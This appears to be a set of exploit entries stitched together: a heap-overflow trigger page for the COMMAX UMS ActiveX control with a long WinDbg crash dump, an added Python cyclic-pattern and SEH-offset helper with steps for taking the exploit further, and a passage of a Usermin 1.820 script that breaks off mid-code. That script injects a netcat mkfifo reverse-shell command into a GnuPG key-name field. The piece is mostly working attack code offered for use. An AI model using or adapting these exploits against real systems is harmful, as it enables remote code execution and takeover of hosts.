FAILURE_MODULE_NAME:  CNC_Ctrl

BUCKET_ID_MODULE_STR:  CNC_Ctrl

FAILURE_FUNCTION_NAME:  DllUnregisterServer

BUCKET_ID_FUNCTION_STR:  DllUnregisterServer

BUCKET_ID_OFFSET:  f5501

BUCKET_ID_MODTIMEDATESTAMP:  547ed821

BUCKET_ID_MODCHECKSUM:  357a4b

BUCKET_ID_MODVER_STR:  1.7.0.2

BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_

FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

FAILURE_SYMBOL_NAME:  CNC_Ctrl.DLL!DllUnregisterServer

WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1

TARGET_TIME:  2021-08-12T12:21:50.000Z

OSBUILD:  19042

OSSERVICEPACK:  1023

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS Personal

USER_LCID:  0

OSBUILD_TIMESTAMP:  unknown_date

BUILDDATESTAMP_STR:  160101.0800

BUILDLAB_STR:  WinBuild

BUILDOSVER_STR:  10.0.19041.1023

ANALYSIS_SESSION_ELAPSED_TIME:  1d869

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver

FAILURE_ID_HASH:  {5e1e375a-c411-e928-cd64-b7f6c07eea3b}

Followup:     MachineOwner
---------
-
COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow
# Exploit Title: COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX UMS Client ActiveX Control 1.7.0.2 (CNC_Ctrl.dll) Heap Buffer Overflow

Vendor: COMMAX Co., Ltd.
Product web page: https://www.commax.com
Affected version: 1.7.0.2

Summary: COMMAX activex web viewer UMS client (32bit) for COMMAX DVR/NVR.

Desc: The vulnerability is caused due to a boundary error in the processing of user input, which can be exploited to cause a heap based buffer overflow when a user inserts an overly long array of string bytes through several functions. Successful exploitation could allow execution of arbitrary code on the affected node.

Tested on: Microsoft Windows 10 Home (64bit) EN
           Microsoft Internet Explorer 20H2

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5664
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5664.php

02.08.2021

--

<!-- functions: rtsp_forceconnect_login() and rtsp_connect_login() -->
<!-- parameters: user_id, user_pwd and rtsp_addr -->

<html>
<object classid='clsid:3D6F2DBA-F4E5-40A6-8725-E99BC96CC23A' id='cel' />
<script language='vbscript'>

targetFile = "C:\Windows\Downloaded Program Files\CNC_CTRL.dll"
prototype  = "Function rtsp_forceconnect_login ( ByVal user_id As String , ByVal user_pwd As String , ByVal rtsp_addr As String , ByVal rtsp_port As Long , ByVal rtp_proto As Long , ByVal device As Long , ByVal islive As Long , ByVal ch As Long ) As Long"
memberName = "rtsp_forceconnect_login"
progid     = "CNC_CTRLLib.UMS_Ctrl"
argCount   = 8

arga=String(2510, "C")
argb=String(2510, "B")
argc=String(2510, "A")
argd=1
arge=1
argf=1
argg=1
argh=1

cel.rtsp_forceconnect_login arga ,argb ,argc ,argd ,arge ,argf ,argg ,argh

</script>
</html>

==

(5b1c.59e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for CNC_Ctrl.DLL -
CNC_Ctrl!DllUnregisterServer+0x19e34:
10028cf2 83a1d412000000  and     dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
0:000:x86> r
eax=00000001 ebx=10119db8 ecx=00000000 edx=81ff6f2e esi=058c0048 edi=00000001
eip=10028cf2 esp=030fcf10 ebp=030fe33c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
CNC_Ctrl!DllUnregisterServer+0x19e34:
10028cf2 83a1d412000000  and     dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
0:000:x86> !exchain
030feab4: 41414141
Invalid exception stack at 41414141
0:000:x86> d esp
030fcf10  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf20  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf30  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf40  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf50  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf60  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf70  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
030fcf80  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000:x86> d ebp
030fe33c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe34c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe35c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe36c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe37c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe38c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe39c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
030fe3ac  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
0:000:x86> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

GetUrlPageData2 (WinHttp) failed: 12002.

DUMP_CLASS: 2

DUMP_QUALIFIER: 0

FAULTING_IP:
CNC_Ctrl!DllUnregisterServer+18ee3
10027da1 8999d4120000    mov     dword ptr [ecx+12D4h],ebx

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 10027da1 (CNC_Ctrl!DllUnregisterServer+0x00018ee3)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 000012d4
Attempt to write to address 000012d4

FAULTING_THREAD:  000056a4

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE

PROCESS_NAME:  wscript.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  000012d4

FOLLOWUP_IP:
CNC_Ctrl!DllUnregisterServer+18ee3
10027da1 8999d4120000    mov     dword ptr [ecx+12D4h],ebx

WRITE_ADDRESS:  000012d4

WATSON_BKT_PROCSTAMP:  7159f3df

WATSON_BKT_PROCVER:  5.812.10240.16384

PROCESS_VER_PRODUCT:  Microsoft ® Windows Script Host

WATSON_BKT_MODULE:  CNC_Ctrl.DLL

WATSON_BKT_MODSTAMP:  547ed821

WATSON_BKT_MODOFFSET:  27da1

WATSON_BKT_MODVER:  1.7.0.2

MODULE_VER_PRODUCT:  CNC_Ctrl Module

BUILD_VERSION_STRING:  10.0.19041.1023 (WinBuild.160101.0800)

MODLIST_WITH_TSCHKSUM_HASH:  d459299c6b0ff5b482d41c6445b84a3447c0171e

MODLIST_SHA1_HASH:  18e8e8c8cdd4f9db5369e6ca934fd1b74bcb19c1

NTGLOBALFLAG:  0

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  784

DUMP_TYPE:  fe

ANALYSIS_SESSION_HOST:  LAB17

ANALYSIS_SESSION_TIME:  08-12-2021 13:37:16.0907

ANALYSIS_VERSION: 10.0.16299.91 amd64fre

THREAD_ATTRIBUTES:
OS_LOCALE:  ENU

PROBLEM_CLASSES:

    ID:     [0n301]
    Type:   [@ACCESS_VIOLATION]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Omit
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x56a4]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n274]
    Type:   [INVALID_POINTER_WRITE]
    Class:  Primary
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x56a4]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n152]
    Type:   [ZEROED_STACK]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [0x56e4]
    TID:    [0x56a4]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

IP_ON_HEAP:  61616161
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 61616161

FRAME_ONE_INVALID: 1

LAST_CONTROL_TRANSFER:  from 61616161 to 10027da1

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
00afe294 61616161 61616161 61616161 61616161 CNC_Ctrl!DllUnregisterServer+0x18ee3
00afe298 61616161 61616161 61616161 61616161 0x61616161
00afe29c 61616161 61616161 61616161 61616161 0x61616161
00afe2a0 61616161 61616161 61616161 61616161 0x61616161
00afe2a4 61616161 61616161 61616161 61616161 0x61616161
00afe2a8 61616161 61616161 61616161 61616161 0x61616161
00afe2ac 61616161 61616161 61616161 61616161 0x61616161
00afe2b0 61616161 61616161 61616161 61616161 0x61616161
00afe2b4 61616161 61616161 61616161 61616161 0x61616161
00afe2b8 61616161 61616161 61616161 61616161 0x61616161
00afe2bc 61616161 61616161 61616161 61616161 0x61616161
00afe2c0 61616161 61616161 61616161 61616161 0x61616161
00afe2c4 61616161 61616161 61616161 61616161 0x61616161
00afe2c8 61616161 61616161 61616161 61616161 0x61616161
00afe2cc 61616161 61616161 61616161 61616161 0x61616161
00afe2d0 61616161 61616161 61616161 61616161 0x61616161
00afe2d4 61616161 61616161 61616161 61616161 0x61616161
00afe2d8 61616161 61616161 61616161 61616161 0x61616161
00afe2dc 61616161 61616161 61616161
61616161 0x61616161 00afe2e0 61616161 61616161 61616161 61616161 0x61616161 00afe2e4 61616161 61616161 61616161 61616161 0x61616161 00afe2e8 61616161 61616161 61616161 61616161 0x61616161 00afe2ec 61616161 61616161 61616161 61616161 0x61616161 00afe2f0 61616161 61616161 61616161 61616161 0x61616161 00afe2f4 61616161 61616161 61616161 61616161 0x61616161 00afe2f8 61616161 61616161 61616161 61616161 0x61616161 00afe2fc 61616161 61616161 61616161 61616161 0x61616161 00afe300 61616161 61616161 61616161 61616161 0x61616161 00afe304 61616161 61616161 61616161 61616161 0x61616161 00afe308 61616161 61616161 61616161 61616161 0x61616161 00afe30c 61616161 61616161 61616161 61616161 0x61616161 00afe310 61616161 61616161 61616161 61616161 0x61616161 00afe314 61616161 61616161 61616161 61616161 0x61616161 00afe318 61616161 61616161 61616161 41414141 0x61616161 00afe31c 61616161 61616161 41414141 41414141 0x61616161 00afe320 61616161 41414141 41414141 41414141 0x61616161 00afe324 41414141 41414141 41414141 41414141 0x61616161 00afe328 41414141 41414141 41414141 41414141 0x41414141 00afe32c 41414141 41414141 41414141 41414141 0x41414141 00afe330 41414141 41414141 41414141 41414141 0x41414141 00afe334 41414141 41414141 41414141 41414141 0x41414141 00afe338 41414141 41414141 41414141 41414141 0x41414141 00afe33c 41414141 41414141 41414141 41414141 0x41414141 00afe340 41414141 41414141 41414141 41414141 0x41414141 00afe344 41414141 41414141 41414141 41414141 0x41414141 00afe348 41414141 41414141 41414141 41414141 0x41414141 00afe34c 41414141 41414141 41414141 41414141 0x41414141 00afe350 41414141 41414141 41414141 41414141 0x41414141 00afe354 41414141 41414141 41414141 41414141 0x41414141 00afe358 41414141 41414141 41414141 41414141 0x41414141 00afe35c 41414141 41414141 41414141 41414141 0x41414141 00afe360 41414141 41414141 41414141 41414141 0x41414141 00afe364 41414141 41414141 41414141 41414141 0x41414141 00afe368 41414141 41414141 41414141 41414141 0x41414141 00afe36c 41414141 
41414141 41414141 41414141 0x41414141 00afe370 41414141 41414141 41414141 41414141 0x41414141 00afe374 41414141 41414141 41414141 41414141 0x41414141 00afe378 41414141 41414141 41414141 41414141 0x41414141 00afe37c 41414141 41414141 41414141 41414141 0x41414141 00afe380 41414141 41414141 41414141 41414141 0x41414141 00afe384 41414141 41414141 41414141 41414141 0x41414141 00afe388 41414141 41414141 41414141 41414141 0x41414141 00afe38c 41414141 41414141 41414141 41414141 0x41414141 00afe390 41414141 41414141 41414141 41414141 0x41414141 00afe394 41414141 41414141 41414141 41414141 0x41414141 00afe398 41414141 41414141 41414141 41414141 0x41414141 00afe39c 41414141 41414141 41414141 41414141 0x41414141 00afe3a0 41414141 41414141 41414141 41414141 0x41414141 00afe3a4 41414141 41414141 41414141 41414141 0x41414141 00afe3a8 41414141 41414141 41414141 41414141 0x41414141 00afe3ac 41414141 41414141 41414141 41414141 0x41414141 00afe3b0 41414141 41414141 41414141 41414141 0x41414141 00afe3b4 41414141 41414141 41414141 41414141 0x41414141 00afe3b8 41414141 41414141 41414141 41414141 0x41414141 00afe3bc 41414141 41414141 41414141 41414141 0x41414141 00afe3c0 41414141 41414141 41414141 41414141 0x41414141 00afe3c4 41414141 41414141 41414141 41414141 0x41414141 00afe3c8 41414141 41414141 41414141 41414141 0x41414141 00afe3cc 41414141 41414141 41414141 41414141 0x41414141 00afe3d0 41414141 41414141 41414141 41414141 0x41414141 00afe3d4 41414141 41414141 41414141 41414141 0x41414141 00afe3d8 41414141 41414141 41414141 41414141 0x41414141 00afe3dc 41414141 41414141 41414141 41414141 0x41414141 00afe3e0 41414141 41414141 41414141 41414141 0x41414141 00afe3e4 41414141 41414141 41414141 41414141 0x41414141 00afe3e8 41414141 41414141 41414141 41414141 0x41414141 00afe3ec 41414141 41414141 41414141 41414141 0x41414141 00afe3f0 41414141 41414141 41414141 41414141 0x41414141 00afe3f4 41414141 41414141 41414141 41414141 0x41414141 00afe3f8 41414141 41414141 41414141 41414141 0x41414141 
00afe3fc 41414141 41414141 41414141 41414141 0x41414141 00afe400 41414141 41414141 41414141 41414141 0x41414141 00afe404 41414141 41414141 41414141 41414141 0x41414141 00afe408 41414141 41414141 41414141 41414141 0x41414141 00afe40c 41414141 41414141 41414141 41414141 0x41414141 00afe410 41414141 41414141 41414141 41414141 0x41414141 00afe414 41414141 41414141 41414141 41414141 0x41414141 00afe418 41414141 41414141 41414141 41414141 0x41414141 00afe41c 41414141 41414141 41414141 41414141 0x41414141 00afe420 41414141 41414141 41414141 41414141 0x41414141 00afe424 41414141 41414141 41414141 41414141 0x41414141 00afe428 41414141 41414141 41414141 41414141 0x41414141 00afe42c 41414141 41414141 41414141 41414141 0x41414141 00afe430 41414141 41414141 41414141 41414141 0x41414141 00afe434 41414141 41414141 41414141 41414141 0x41414141 00afe438 41414141 41414141 41414141 41414141 0x41414141 00afe43c 41414141 41414141 41414141 41414141 0x41414141 00afe440 41414141 41414141 41414141 41414141 0x41414141 00afe444 41414141 41414141 41414141 41414141 0x41414141 00afe448 41414141 41414141 41414141 41414141 0x41414141 00afe44c 41414141 41414141 41414141 41414141 0x41414141 00afe450 41414141 41414141 41414141 41414141 0x41414141 00afe454 41414141 41414141 41414141 41414141 0x41414141 00afe458 41414141 41414141 41414141 41414141 0x41414141 00afe45c 41414141 41414141 41414141 41414141 0x41414141 00afe460 41414141 41414141 41414141 41414141 0x41414141 00afe464 41414141 41414141 41414141 41414141 0x41414141 00afe468 41414141 41414141 41414141 41414141 0x41414141 00afe46c 41414141 41414141 41414141 41414141 0x41414141 00afe470 41414141 41414141 41414141 41414141 0x41414141 00afe474 41414141 41414141 41414141 41414141 0x41414141 00afe478 41414141 41414141 41414141 41414141 0x41414141 00afe47c 41414141 41414141 41414141 41414141 0x41414141 00afe480 41414141 41414141 41414141 41414141 0x41414141 00afe484 41414141 41414141 41414141 41414141 0x41414141 00afe488 41414141 41414141 41414141 
41414141 0x41414141 00afe48c 41414141 41414141 41414141 41414141 0x41414141 00afe490 41414141 41414141 41414141 41414141 0x41414141 00afe494 41414141 41414141 41414141 41414141 0x41414141 00afe498 41414141 41414141 41414141 41414141 0x41414141 00afe49c 41414141 41414141 41414141 41414141 0x41414141 00afe4a0 41414141 41414141 41414141 41414141 0x41414141 00afe4a4 41414141 41414141 41414141 41414141 0x41414141 00afe4a8 41414141 41414141 41414141 41414141 0x41414141 00afe4ac 41414141 41414141 41414141 41414141 0x41414141 00afe4b0 41414141 41414141 41414141 41414141 0x41414141 00afe4b4 41414141 41414141 41414141 41414141 0x41414141 00afe4b8 41414141 41414141 41414141 41414141 0x41414141 00afe4bc 41414141 41414141 41414141 41414141 0x41414141 00afe4c0 41414141 41414141 41414141 41414141 0x41414141 00afe4c4 41414141 41414141 41414141 41414141 0x41414141 00afe4c8 41414141 41414141 41414141 41414141 0x41414141 00afe4cc 41414141 41414141 41414141 41414141 0x41414141 00afe4d0 41414141 41414141 41414141 41414141 0x41414141 00afe4d4 41414141 41414141 41414141 41414141 0x41414141 00afe4d8 41414141 41414141 41414141 41414141 0x41414141 00afe4dc 41414141 41414141 41414141 41414141 0x41414141 00afe4e0 41414141 41414141 41414141 41414141 0x41414141 00afe4e4 41414141 41414141 41414141 41414141 0x41414141 00afe4e8 41414141 41414141 41414141 41414141 0x41414141 00afe4ec 41414141 41414141 41414141 41414141 0x41414141 00afe4f0 41414141 41414141 41414141 41414141 0x41414141 00afe4f4 41414141 41414141 41414141 41414141 0x41414141 00afe4f8 41414141 41414141 41414141 41414141 0x41414141 00afe4fc 41414141 41414141 41414141 41414141 0x41414141 00afe500 41414141 41414141 41414141 41414141 0x41414141 00afe504 41414141 41414141 41414141 41414141 0x41414141 00afe508 41414141 41414141 41414141 41414141 0x41414141 00afe50c 41414141 41414141 41414141 41414141 0x41414141 00afe510 41414141 41414141 41414141 41414141 0x41414141 00afe514 41414141 41414141 41414141 41414141 0x41414141 00afe518 41414141 
41414141 41414141 41414141 0x41414141 00afe51c 41414141 41414141 41414141 41414141 0x41414141 00afe520 41414141 41414141 41414141 41414141 0x41414141 00afe524 41414141 41414141 41414141 41414141 0x41414141 00afe528 41414141 41414141 41414141 41414141 0x41414141 00afe52c 41414141 41414141 41414141 41414141 0x41414141 00afe530 41414141 41414141 41414141 41414141 0x41414141 00afe534 41414141 41414141 41414141 41414141 0x41414141 00afe538 41414141 41414141 41414141 41414141 0x41414141 00afe53c 41414141 41414141 41414141 41414141 0x41414141 00afe540 41414141 41414141 41414141 41414141 0x41414141 00afe544 41414141 41414141 41414141 41414141 0x41414141 00afe548 41414141 41414141 41414141 41414141 0x41414141 00afe54c 41414141 41414141 41414141 41414141 0x41414141 00afe550 41414141 41414141 41414141 41414141 0x41414141 00afe554 41414141 41414141 41414141 41414141 0x41414141 00afe558 41414141 41414141 41414141 41414141 0x41414141 00afe55c 41414141 41414141 41414141 41414141 0x41414141 00afe560 41414141 41414141 41414141 41414141 0x41414141 00afe564 41414141 41414141 41414141 41414141 0x41414141 00afe568 41414141 41414141 41414141 41414141 0x41414141 00afe56c 41414141 41414141 41414141 41414141 0x41414141 00afe570 41414141 41414141 41414141 41414141 0x41414141 00afe574 41414141 41414141 41414141 41414141 0x41414141 00afe578 41414141 41414141 41414141 41414141 0x41414141 00afe57c 41414141 41414141 41414141 41414141 0x41414141 00afe580 41414141 41414141 41414141 41414141 0x41414141 00afe584 41414141 41414141 41414141 41414141 0x41414141 00afe588 41414141 41414141 41414141 41414141 0x41414141 00afe58c 41414141 41414141 41414141 41414141 0x41414141 00afe590 41414141 41414141 41414141 41414141 0x41414141 00afe594 41414141 41414141 41414141 41414141 0x41414141 00afe598 41414141 41414141 41414141 41414141 0x41414141 00afe59c 41414141 41414141 41414141 41414141 0x41414141 00afe5a0 41414141 41414141 41414141 41414141 0x41414141 00afe5a4 41414141 41414141 41414141 41414141 0x41414141 
00afe5a8 41414141 41414141 41414141 41414141 0x41414141 00afe5ac 41414141 41414141 41414141 41414141 0x41414141 00afe5b0 41414141 41414141 41414141 41414141 0x41414141 00afe5b4 41414141 41414141 41414141 41414141 0x41414141 00afe5b8 41414141 41414141 41414141 41414141 0x41414141 00afe5bc 41414141 41414141 41414141 41414141 0x41414141 00afe5c0 41414141 41414141 41414141 41414141 0x41414141 00afe5c4 41414141 41414141 41414141 41414141 0x41414141 00afe5c8 41414141 41414141 41414141 41414141 0x41414141 00afe5cc 41414141 41414141 41414141 41414141 0x41414141 00afe5d0 41414141 41414141 41414141 41414141 0x41414141 00afe5d4 41414141 41414141 41414141 41414141 0x41414141 00afe5d8 41414141 41414141 41414141 41414141 0x41414141 00afe5dc 41414141 41414141 41414141 41414141 0x41414141 00afe5e0 41414141 41414141 41414141 41414141 0x41414141 00afe5e4 41414141 41414141 41414141 41414141 0x41414141 00afe5e8 41414141 41414141 41414141 41414141 0x41414141 00afe5ec 41414141 41414141 41414141 41414141 0x41414141 00afe5f0 41414141 41414141 41414141 41414141 0x41414141 00afe5f4 41414141 41414141 41414141 41414141 0x41414141 STACK_COMMAND: ~0s ; .cxr ; kb THREAD_SHA1_HASH_MOD_FUNC: 1ff3866701b0a93c59477aaf393ad9182c6cbb4f THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 31358b3bd1a2fecfa57be49dd21574669d1b1ea2 THREAD_SHA1_HASH_MOD: 2219bd78d12868af57c664db206871e4461019b1 FAULT_INSTR_CODE: 12d49989 SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+18ee3 FOLLOWUP_NAME: MachineOwner MODULE_NAME: CNC_Ctrl IMAGE_NAME: CNC_Ctrl.DLL DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821 FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+18ee3 FAILURE_EXCEPTION_CODE: c0000005 FAILURE_IMAGE_NAME: CNC_Ctrl.DLL BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL FAILURE_MODULE_NAME: CNC_Ctrl BUCKET_ID_MODULE_STR: CNC_Ctrl FAILURE_FUNCTION_NAME: DllUnregisterServer BUCKET_ID_FUNCTION_STR: DllUnregisterServer 
BUCKET_ID_OFFSET: 18ee3 BUCKET_ID_MODTIMEDATESTAMP: 547ed821 BUCKET_ID_MODCHECKSUM: 357a4b BUCKET_ID_MODVER_STR: 1.7.0.2 BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_ FAILURE_PROBLEM_CLASS: APPLICATION_FAULT FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/wscript.exe/5.812.10240.16384/7159f3df/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/00027da1.htm?Retriage=1 TARGET_TIME: 2021-08-12T11:37:22.000Z OSBUILD: 19042 OSSERVICEPACK: 1023 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 OSPLATFORM_TYPE: x64 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt SingleUserTS Personal USER_LCID: 0 OSBUILD_TIMESTAMP: unknown_date BUILDDATESTAMP_STR: 160101.0800 BUILDLAB_STR: WinBuild BUILDOSVER_STR: 10.0.19041.1023 ANALYSIS_SESSION_ELAPSED_TIME: 68b2 ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b} Followup: MachineOwner ---------
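What the dump above establishes: the access violation happens inside CNC_Ctrl!DllUnregisterServer before any attacker-controlled address is executed (ecx is 0, so the write to [ecx+12D4h] faults), but `!exchain` already shows the exception registration record overwritten with 41414141 and ebp sitting in the 61616161 region. Once the exception is dispatched, the overwritten handler gets control, which is why the SEH offset is the number you need next. A uniform 'A'/'a' fill cannot give it; a cyclic pattern can. The following is an added example, not part of the advisory above: a Metasploit-style pattern generator plus an offset lookup that takes the dword exactly as WinDbg prints it (little-endian) and a helper for the two SEH dwords. The sample values passed in at the bottom are constructed.

```python
import string

# Character classes used by the Metasploit pattern_create / pattern_offset tools.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length: int) -> bytes:
    """Cyclic pattern in which every aligned (Upper, lower, digit) triple is
    unique, so any 4-byte window occurs at exactly one offset within the
    first 26*26*10*3 = 20280 bytes."""
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern: bytes, value: int, width: int = 4) -> int:
    """Offset in `pattern` of a register or SEH value as WinDbg prints it
    (e.g. 0x41336141).  x86 is little-endian, so the bytes are reversed
    before searching.  Returns -1 when the value is not part of the pattern
    (as 0x41414141 from a plain 'A' fill never is)."""
    needle = value.to_bytes(width, byteorder="little")
    return pattern.find(needle)


def seh_offsets(pattern: bytes, nseh: int, seh: int) -> dict:
    """Given the two dwords of the overwritten EXCEPTION_REGISTRATION_RECORD
    (what `!exchain` reports: next-record pointer, then handler), return where
    in the payload each one landed.  A clean overwrite puts them 4 bytes apart."""
    n = pattern_offset(pattern, nseh)
    h = pattern_offset(pattern, seh)
    return {"nseh": n, "seh": h, "consistent": n != -1 and h == n + 4}


if __name__ == "__main__":
    buf = pattern_create(2000)
    # Constructed values, as if copied from `!exchain` after a pattern run:
    print(pattern_offset(buf, 0x41336141))              # 9  ("Aa3A")
    print(seh_offsets(buf, 0x41336141, 0x61413461))     # nSEH at 9, SEH at 13
```

Replace the 'A' and 'a' fills in the trigger with `pattern_create()` output of the same total length, re-run under WinDbg, and feed the `!exchain` dwords to `seh_offsets()`; the two results tell you where to place the jump and the handler address.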
-
Usermin 1.820 - Remote Code Execution (RCE) (Authenticated)
# Title: Usermin 1.820 - Remote Code Execution (RCE) (Authenticated)
# Date: 27.08.2021
# Author: Numan Türle
# Vendor Homepage: https://www.webmin.com/usermin.html
# Software Link: https://github.com/webmin/usermin
# Version: <=1820
# https://www.youtube.com/watch?v=wiRIWFAhz24

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
# author: twitter.com/numanturle
# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://youtu.be/wiRIWFAhz24

import argparse, requests, warnings, json, re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd

warnings.simplefilter('ignore', InsecureRequestWarning)


def init():
    parser = argparse.ArgumentParser(description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )')
    parser.add_argument('-u', '--host', help='Host', type=str, required=True)
    parser.add_argument('-l', '--login', help='Username', type=str, required=True)
    parser.add_argument('-p', '--password', help='Password', type=str, required=True)
    args = parser.parse_args()
    exploit(args)


def exploit(args):
    # address/port the reverse shell connects back to; set to your listener
    listen_ip = "0.0.0.0"
    listen_port = 1337
    session = requests.Session()
    target = "https://{}:20000".format(args.host)
    username = args.login
    password = args.password
    print("[+] Target {}".format(target))
    headers = {
        'Cookie': 'redirect=1; testing=1;',
        'Referer': target
    }
    login = session.post(target + "/session_login.cgi", headers=headers, verify=False,
                         data={"user": username, "pass": password})
    login_content = str(login.content)
    search = "webmin_search.cgi"
    check_login_string = re.findall(search, login_content)
    if check_login_string:
        session_hand_login = session.cookies.get_dict()
        print("[+] Login successfully")
        print("[+] Setup GnuPG")
        payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;".format(listen_ip, listen_port)
        # payload = "whoami;"
        # the key name is interpolated into a shell command: close the quote, run the payload, reopen it
        post_data = {
            "name": '";{}echo "'.format(payload),
            "email": "[email protected]",
        }
        print("[+] Payload {}".format(post_data))
        session.headers.update({'referer': target})
        create_secret = session.post(target + "/gnupg/secret.cgi", verify=False, data=post_data)
        create_secret_content = str(create_secret.content)
        search = "successfully"
        check_exp = re.findall(search, create_secret_content)
        if check_exp:
            print("[+] Setup successful")
            print("[+] Fetching key list")
            session.headers.update({'referer': target})
            key_list = session.post(target + "/gnupg/list_keys.cgi", verify=False)
